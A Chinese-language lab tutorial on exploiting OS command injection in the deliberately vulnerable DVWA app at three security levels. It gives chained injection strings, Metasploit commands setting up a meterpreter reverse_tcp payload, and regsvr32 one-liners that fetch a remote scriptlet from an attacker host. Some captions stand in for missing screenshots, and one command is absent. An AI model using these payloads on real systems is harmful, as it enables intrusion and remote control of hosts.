Metasploit实战命令注入教程:在DVWA中实战演练OS命令注入漏洞

命令注入是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令。当应用程序将不安全的用户提供的数据(表单,cookie,HTTP标头等)传递给系统shell时,可能会发生命令注入攻击。在此攻击中,攻击者提供的操作系统命令通常以易受攻击的应用程序的权限执行。命令注入攻击很可能主要是由于输入验证不足。
此攻击与代码注入不同,因为代码注入允许攻击者添加自己的代码,然后由应用程序执行。在代码注入中,攻击者扩展了应用程序的默认功能,而无需执行系统命令。
资源:https://www.owasp.org/index.php/Command_Injection
首先,在学习课程之前保证你已经安装了DVWA,点击学习DVWA安装教程
现在打开电脑中的DVWA并使用以下凭据登录:
用户名  - admin
密码  - password

选择低级别安全性
单击DVWA Security并将网站安全级别设置为
在命令注入中使用“&&”来绕过此服务器的低安全性。
在DVWA中实战演练OS命令注入漏洞
转到命令执行页面输入IP地址,然后单击“提交”。
在DVWA中实战演练OS命令注入漏洞
现在您可以看到回复告诉我们已与服务器建立连接。我已经尝试了很多次以确保这一点,因此,无论何时执行此命令,您都会看到以下内容:
在DVWA中实战演练OS命令注入漏洞
我们也可以通过使用 sign 同时实现多个命令  。例如,下一个命令是:
192.168.1.100 && dir

在上面的命令单击提交后,  执行上述命令将逐项列出所有目录和文件。
在DVWA中实战演练OS命令注入漏洞
我们找到了4个目录和一个文件以及该目录的路径。
在DVWA中实战演练OS命令注入漏洞
下一个命令是192.168.1.100 && net user点击提交,此命令将显示用户的列表
在DVWA中实战演练OS命令注入漏洞
在DVWA中实战演练OS命令注入漏洞
提供各种命令,在提交时将给出预期的结果。首先,我们将找到一种方法将我的恶意负载转移到远程机器,为此我使用我最喜欢的工具metasploit。要使用metasploit,您需要在kali终端中键入msfconsole,然后键入以下命令
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.106
msf exploit(regsvr32_applocker_bypass_server) > set lport 4444
msf exploit(regsvr32_applocker_bypass_server) > exploit
在DVWA中实战演练OS命令注入漏洞
我们可以使用以下命令打开远程主机上的端口,并使用metasploit连接回端口。

然后单击“ 提交”
在DVWA中实战演练OS命令注入漏洞
现在您将获得受害者PC的计时器会话。并输入  sysinfo  以获取系统信息。
在DVWA中实战演练OS命令注入漏洞

绕过中级安全性
单击DVWA Security并设置Website Security Level Medium
在命令注入中使用管道“|”来绕过此服务器的介质安全性。
在DVWA中实战演练OS命令注入漏洞
使用metasploit执行与上面相同的过程,并进一步输入:
192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll
在DVWA中实战演练OS命令注入漏洞
我们再一次得到了预备会话2
在DVWA中实战演练OS命令注入漏洞

绕过高级别安全性
单击DVWA Security并将网站安全级别设置为
尝试使用管道“ || “在命令注入中绕过此服务器的高安全性
在DVWA中实战演练OS命令注入漏洞
使用metasploit执行与上述相同的过程
192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll
然后单击“ 提交”
在DVWA中实战演练OS命令注入漏洞
是的,我们有一个测试会话3!
在DVWA中实战演练OS命令注入漏洞
最后我们完成了所有三级低,中,高DVWA。
转载请注明本文链接: http://www.mayidui.net/t2232.html
游客
登录后才可以回帖,登录 或者 注册